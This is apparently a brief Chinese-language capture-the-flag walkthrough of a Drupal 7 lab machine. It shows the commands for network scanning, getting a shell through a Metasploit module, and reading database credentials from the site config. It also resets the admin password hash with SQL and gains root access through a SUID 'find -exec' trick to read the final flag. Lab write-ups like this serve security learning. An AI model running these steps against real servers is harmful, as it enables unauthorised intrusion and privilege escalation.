知道版本号 drupal 7 直接用msf payload一个一个尝试可以获得meterspreter shell
arp-scan --interface=eth0 --localnet
flag1:

百度 drupal 配置文件的位置 ‘sites/default/files’;
flag2:

这里flag2说不能爆破,而且配置文件给了数据库连接密码
使用python开启交互式shell
当使用meterspreter shell 是输入shell 进入普通shell,然是使用python -c 'import pty;pty.spawn("/bin/bash")'
就可以进入交互式shell
在交互式shell 中连接数据库 mysql -uuser -ppasswd

users表里可以查到admin的密码
想登录这个网址,那么就要拿到这个密码,1.破解密码,但密钥在哪呢。2.生成密码,替换。不太清楚那种简单一点
数据加密脚本位置:/scripts/password-hash.sh
使用方法:先回到网址根目录,然后使用如图命令,加密一下admin得到hash

登录数据库使用修改数据库命令语句来更新admin 的密码:
update users set pass="xxxxx" where name="admin";

使用账户密码登录系统后可以找的flag3


全局搜索flag find / -name “flag”
可以看到/home/flag4/flag4.txt和/root/thefinalflag.txt

其中flag4是当前的www权限可以读取的

而root的那个当然读取不了
提权:使用find -perm参数来找可以用来提权的文件
PERM是指find命令的-perm参数使用方法
find -perm,根据文件的权限来查找文件
具体的-u=s
是指查找SUID位为s
例如:-u=r
是指查找可读文件,-u=x
是指查可执行文件https://blog.csdn.net/u010633704/article/details/50747898

发现 find 也在其中 find 可以用来-exec 执行命令

使用find -exec 读取到了最终flag find aaa -exec cat /root/thefinalflag.txt \;
aaa是随便创建的空的文件夹

网友评论